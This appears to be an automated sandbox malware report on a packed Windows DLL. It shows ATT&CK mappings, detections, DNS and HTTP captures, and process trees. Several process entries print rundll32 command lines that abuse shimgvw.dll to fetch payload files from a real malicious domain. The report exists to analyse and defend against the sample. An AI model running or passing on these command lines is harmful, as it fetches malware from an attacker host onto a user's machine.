Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEE503D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6BEE503D
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 111 Process Injection | 11 Virtualization/Sandbox Evasion | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 111 Process Injection | LSASS Memory | 21 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 11 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 21 Obfuscated Files or Information | NTDS | 1 File and Directory Discovery | Distributed Component Object Model | Input Capture | 14 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Rundll32 | LSA Secrets | 12 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Software Packing | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
[Behavior graph] Behavior Graph ID: 1500944; Sample: LLD5HDX0PS.dll; Startdate: 29/08/2024; Architecture: WINDOWS; Score: 84
Signatures shown: Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; Sigma detected: rundll32 run dll from internet; 2 other signatures; System process connects to network (likely due to code injection or exploit)
Processes shown: loaddll32.exe started rundll32.exe, cmd.exe, rundll32.exe and 2 other processes; cmd.exe started rundll32.exe, which started two further rundll32.exe processes; the second rundll32.exe started two rundll32.exe processes
DNS/IP shown: rammenale.com 131.153.206.231, 443, 49712, 49713 SS-ASHUS United States (contacted by rundll32.exe)

Source | Detection | Scanner | Label | Link
LLD5HDX0PS.dll | 0% | ReversingLabs | |
LLD5HDX0PS.dll | 10% | Virustotal | | Browse
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
rammenale.com | 1% | Virustotal | | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
rammenale.com | 131.153.206.231 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://rammenale.com/for2/regit.tmp | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
        • Avira URL Cloud: malware
        unknown
        https://rammenale.com/for2/regit.tmpurundll32.exe, 00000008.00000002.3369773765.0000000000779000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IP | Domain | Country | ASN | ASN Name | Malicious
        131.153.206.231 | rammenale.com | United States | 19437 | SS-ASHUS | true
        Joe Sandbox version: 40.0.0 Tourmaline
        Analysis ID: 1500944
        Start date and time: 2024-08-29 06:52:08 +02:00
        Joe Sandbox product: CloudBasic
        Overall analysis duration: 0h 5m 0s
        Hypervisor based Inspection enabled: false
        Report type: full
        Cookbook file name: default.jbs
        Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed: 16
        Number of new started drivers analysed: 0
        Number of existing processes analysed: 0
        Number of existing drivers analysed: 0
        Number of injected processes analysed: 0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode: default
        Analysis stop reason: Timeout
        Sample name: LLD5HDX0PS.dll
        renamed because original name is a hash value
        Original Sample Name: 4b74d5e09bca4898a782e938a8f9889b9ebadf8b0f14368bca90d9d0e68da472.dll
        Detection: MAL
        Classification: mal84.evad.winDLL@20/0@1/1
        EGA Information:
        • Successful, ratio: 40%
        HCA Information:
        • Successful, ratio: 97%
        • Number of executed functions: 15
        • Number of non-executed functions: 52
        Cookbook Comments:
        • Found application associated with file extension: .dll
        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
        • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
        • Execution Graph export aborted for target rundll32.exe, PID 2192 because there are no executed function
        • Execution Graph export aborted for target rundll32.exe, PID 4988 because there are no executed function
        • Execution Graph export aborted for target rundll32.exe, PID 5960 because there are no executed function
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        Time | Type | Description
        00:53:01 | API Interceptor | 2x Sleep call for process: rundll32.exe modified
        00:53:04 | API Interceptor | 1x Sleep call for process: loaddll32.exe modified
            Match | Associated Sample Name / URL | Detection | Threat Name | Context
            131.153.206.231 | Dll1.dll | malicious | Unknown |
            131.153.206.231 | Dll1.dll | malicious | Unknown |

            Match | Associated Sample Name / URL | Detection | Threat Name | Context
            rammenale.com | Dll1.dll | malicious | Unknown | 131.153.206.231
            rammenale.com | Dll1.dll | malicious | Unknown | 131.153.206.231

            Match | Associated Sample Name / URL | Detection | Threat Name | Context
            SS-ASHUS | Dll1.dll | malicious | Unknown | 131.153.206.231
            SS-ASHUS | Dll1.dll | malicious | Unknown | 131.153.206.231
            SS-ASHUS | https://blockchainsolution.netlify.app/ | malicious | Unknown | 131.153.206.100
            SS-ASHUS | http://blockdag-network-rectification.pages.dev/wallet/inputs.html/js/aes.js | malicious | Unknown | 131.153.206.103
            SS-ASHUS | [SUSPECTED SPAM] Your Delivery Has Been Delayed Due to an Address Issue.eml | malicious | Unknown | 131.153.100.38
            SS-ASHUS | Bank Slip.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 131.153.147.106
            SS-ASHUS | Fatura20240617.exe | malicious | FormBook | 131.153.148.82
            SS-ASHUS | 0tkRwEewXq.exe | malicious | FormBook | 131.153.170.234
            SS-ASHUS | CMgd5ZVG2N.elf | malicious | Unknown | 209.100.21.94
            SS-ASHUS | CMV610942X6UI.exe | malicious | FormBook | 131.153.148.82

            Match | Associated Sample Name / URL | Detection | Threat Name | Context
            37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | LummaC, Vidar | 131.153.206.231
            37f463bf4616ecd445d4a1937da06e19 | rSHIPMENT_DOCMSS24071327.exe | malicious | FormBook, GuLoader | 131.153.206.231
            37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | LummaC, Vidar | 131.153.206.231
            37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | LummaC, Stealc, Vidar | 131.153.206.231
            37f463bf4616ecd445d4a1937da06e19 | Dll1.dll | malicious | Unknown | 131.153.206.231
            37f463bf4616ecd445d4a1937da06e19 | Dll1.dll | malicious | Unknown | 131.153.206.231
            37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | LummaC, Vidar | 131.153.206.231
            37f463bf4616ecd445d4a1937da06e19 | x64_installer__v4.5.6.msi | malicious | Unknown | 131.153.206.231
            37f463bf4616ecd445d4a1937da06e19 | Ad#U043ebe_Activator.exe | malicious | LummaC | 131.153.206.231
            37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | Meduza Stealer | 131.153.206.231
            No context
            No created / dropped files found
            File type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
            Entropy (8bit): 7.869173036924203
            TrID:
            • Win32 Dynamic Link Library (generic) (1002004/3) 96.66%
            • UPX compressed Win32 Executable (30571/9) 2.95%
            • Generic Win/DOS Executable (2004/3) 0.19%
            • DOS Executable Generic (2002/1) 0.19%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name: LLD5HDX0PS.dll
            File size: 77'312 bytes
            MD5: 030a68e321dec0e77b4698fccc5d54db
            SHA1: 7b792a49fe27a298343ba26db8cac5ccb150ff89
            SHA256: 4b74d5e09bca4898a782e938a8f9889b9ebadf8b0f14368bca90d9d0e68da472
            SHA512: e6be981690a90fdba8ec35b426a0b4c9617f13ae91d8a93a7e2acec906b23ac46436649d1980bd805937676e7efb6b0d8d9a2b925202e1c1aff4f01e0e6b8a4c
            SSDEEP: 1536:NZ1aEkcCXLqDnRoTMWGuddGlCK1/hCE+pg0OoiKz25Rc5KQ:X1IXLqrRogCK1VTQK5RcIQ
            TLSH: 7C7302EA912B60F3E71462F4608BE376310EEDE0A03DD5C11F6AF487DE9758169847B2
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\K...*...*...*..SR...*..SR...*..SR...*..SR...*...*..{*.......*.......*..SR...*......>*..u....*..u....*..u....*..u....*..Rich.*.
            Icon Hash: 7ae282899bbab082
            Entrypoint: 0x1002d240
            Entrypoint Section: UPX1
            Digitally signed: false
            Imagebase: 0x10000000
            Subsystem: windows gui
            Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
            DLL Characteristics: DYNAMIC_BASE, NX_COMPAT
            Time Stamp: 0x65C149B1 [Mon Feb 5 20:48:49 2024 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major: 6
            OS Version Minor: 0
            File Version Major: 6
            File Version Minor: 0
            Subsystem Version Major: 6
            Subsystem Version Minor: 0
            Import Hash: 0e4a2d076bfe5641392f761be41a5939
            Name | Virtual Address | Virtual Size | Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x2e280 | 0x50 | .rsrc
            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2e1ac | 0xd4 | .rsrc
            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2e000 | 0x1ac | .rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2e2d0 | 0x14 | .rsrc
            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2d414 | 0xc0 | UPX1
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
            UPX0 | 0x1000 | 0x1a000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            UPX1 | 0x1b000 | 0x13000 | 0x12600 | 4350757fa27457564ee454ba47f08942 | False | 0.9846274447278912 | data | 7.906342711948234 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .rsrc | 0x2e000 | 0x1000 | 0x400 | 21f64ab7d3b70b498bd044741208f902 | False | 0.4462890625 | data | 4.003532246262853 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

            Name | RVA | Size | Type | Language | Country | ZLIB Complexity
            RT_MANIFEST | 0x2e05c | 0x14e | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | English | United States | 0.6407185628742516

            DLL | Import
            KERNEL32.DLL | LoadLibraryA, GetProcAddress, VirtualProtect
            ole32.dll | CoInitialize
            OLEAUT32.dll | SysAllocString

            Name | Ordinal | Address
            mydllmain | 1 | 0x10001026

            Language of compilation system | Country where language is spoken | Map
            English | United States |
            Timestamp | Source Port | Dest Port | Source IP | Dest IP
            Aug 29, 2024 06:53:03.468719959 CEST | 60970 | 53 | 192.168.2.6 | 1.1.1.1
            Aug 29, 2024 06:53:04.165409088 CEST | 53 | 60970 | 1.1.1.1 | 192.168.2.6

            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
            Aug 29, 2024 06:53:03.468719959 CEST | 192.168.2.6 | 1.1.1.1 | 0x3772 | Standard query (0) | rammenale.com | A (IP address) | IN (0x0001) | false

            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
            Aug 29, 2024 06:53:04.165409088 CEST | 1.1.1.1 | 192.168.2.6 | 0x3772 | No error (0) | rammenale.com | | 131.153.206.231 | A (IP address) | IN (0x0001) | false
            • rammenale.com
            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            0 | 192.168.2.6 | 49715 | 131.153.206.231 | 443 | 4988 | C:\Windows\SysWOW64\rundll32.exe
            Timestamp | Bytes transferred | Direction | Data
            2024-08-29 04:53:05 UTC | 287 | OUT | GET /for2/regit.tmp HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: rammenale.com
            Connection: Keep-Alive
            2024-08-29 04:53:05 UTC | 416 | IN | HTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1251
            date: Thu, 29 Aug 2024 04:53:05 GMT
            server: LiteSpeed
            alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
            2024-08-29 04:53:05 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
            2024-08-29 04:53:05 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            1 | 192.168.2.6 | 49716 | 131.153.206.231 | 443 | 5432 | C:\Windows\SysWOW64\rundll32.exe
            Timestamp | Bytes transferred | Direction | Data
            2024-08-29 04:53:05 UTC | 287 | OUT | GET /for2/aclog.txt HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: rammenale.com
            Connection: Keep-Alive
            2024-08-29 04:53:06 UTC | 416 | IN | HTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1251
            date: Thu, 29 Aug 2024 04:53:05 GMT
            server: LiteSpeed
            alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
            2024-08-29 04:53:06 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
            2024-08-29 04:53:06 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


            Session ID:2
            Source IP:192.168.2.6
            Source Port:49712
            Destination IP:131.153.206.231
            Destination Port:443
            PID:5308
            Process:C:\Windows\SysWOW64\rundll32.exe
            Timestamp | Bytes transferred | Direction | Data
            2024-08-29 04:53:05 UTC | 287 | OUT | GET /for2/aclog.txt HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: rammenale.com
            Connection: Keep-Alive
            2024-08-29 04:53:05 UTC | 416 | IN | HTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1251
            date: Thu, 29 Aug 2024 04:53:05 GMT
            server: LiteSpeed
            alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
            2024-08-29 04:53:05 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
            2024-08-29 04:53:05 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


            Session ID:3
            Source IP:192.168.2.6
            Source Port:49714
            Destination IP:131.153.206.231
            Destination Port:443
            PID:5332
            Process:C:\Windows\SysWOW64\rundll32.exe
            Timestamp | Bytes transferred | Direction | Data
            2024-08-29 04:53:05 UTC | 287 | OUT | GET /for2/regit.tmp HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: rammenale.com
            Connection: Keep-Alive
            2024-08-29 04:53:05 UTC | 416 | IN | HTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1251
            date: Thu, 29 Aug 2024 04:53:05 GMT
            server: LiteSpeed
            alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
            2024-08-29 04:53:05 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
            2024-08-29 04:53:05 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


            Session ID:4
            Source IP:192.168.2.6
            Source Port:49717
            Destination IP:131.153.206.231
            Destination Port:443
            PID:6136
            Process:C:\Windows\SysWOW64\rundll32.exe
            Timestamp | Bytes transferred | Direction | Data
            2024-08-29 04:53:05 UTC | 287 | OUT | GET /for2/regit.tmp HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: rammenale.com
            Connection: Keep-Alive
            2024-08-29 04:53:06 UTC | 416 | IN | HTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1251
            date: Thu, 29 Aug 2024 04:53:05 GMT
            server: LiteSpeed
            alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
            2024-08-29 04:53:06 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
            2024-08-29 04:53:06 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


            Session ID:5
            Source IP:192.168.2.6
            Source Port:49713
            Destination IP:131.153.206.231
            Destination Port:443
            PID:5960
            Process:C:\Windows\SysWOW64\rundll32.exe
            Timestamp | Bytes transferred | Direction | Data
            2024-08-29 04:53:05 UTC | 287 | OUT | GET /for2/aclog.txt HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: rammenale.com
            Connection: Keep-Alive
            2024-08-29 04:53:05 UTC | 416 | IN | HTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1251
            date: Thu, 29 Aug 2024 04:53:05 GMT
            server: LiteSpeed
            alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
            2024-08-29 04:53:05 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
            2024-08-29 04:53:05 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


            Target ID:0
            Start time:00:53:00
            Start date:29/08/2024
            Path:C:\Windows\System32\loaddll32.exe
            Wow64 process (32bit):true
            Commandline:loaddll32.exe "C:\Users\user\Desktop\LLD5HDX0PS.dll"
            Imagebase:0xc20000
            File size:126'464 bytes
            MD5 hash:51E6071F9CBA48E79F10C84515AAE618
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:1
            Start time:00:53:00
            Start date:29/08/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff66e660000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:2
            Start time:00:53:00
            Start date:29/08/2024
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\LLD5HDX0PS.dll",#1
            Imagebase:0x1c0000
            File size:236'544 bytes
            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:3
            Start time:00:53:00
            Start date:29/08/2024
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe C:\Users\user\Desktop\LLD5HDX0PS.dll,mydllmain
            Imagebase:0xe80000
            File size:61'440 bytes
            MD5 hash:889B99C52A60DD49227C5E485A016679
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:4
            Start time:00:53:00
            Start date:29/08/2024
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe "C:\Users\user\Desktop\LLD5HDX0PS.dll",#1
            Imagebase:0xe80000
            File size:61'440 bytes
            MD5 hash:889B99C52A60DD49227C5E485A016679
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:5
            Start time:00:53:00
            Start date:29/08/2024
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
            Imagebase:0xe80000
            File size:61'440 bytes
            MD5 hash:889B99C52A60DD49227C5E485A016679
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            Target ID:7
            Start time:00:53:00
            Start date:29/08/2024
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
            Imagebase:0xe80000
            File size:61'440 bytes
            MD5 hash:889B99C52A60DD49227C5E485A016679
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            Target ID:8
            Start time:00:53:00
            Start date:29/08/2024
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
            Imagebase:0xe80000
            File size:61'440 bytes
            MD5 hash:889B99C52A60DD49227C5E485A016679
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            Target ID:9
            Start time:00:53:00
            Start date:29/08/2024
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
            Imagebase:0xe80000
            File size:61'440 bytes
            MD5 hash:889B99C52A60DD49227C5E485A016679
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            Target ID:12
            Start time:00:53:03
            Start date:29/08/2024
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
            Imagebase:0xe80000
            File size:61'440 bytes
            MD5 hash:889B99C52A60DD49227C5E485A016679
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            Target ID:13
            Start time:00:53:03
            Start date:29/08/2024
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
            Imagebase:0xe80000
            File size:61'440 bytes
            MD5 hash:889B99C52A60DD49227C5E485A016679
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

              Execution Graph

              Execution Coverage:3.1%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:6.9%
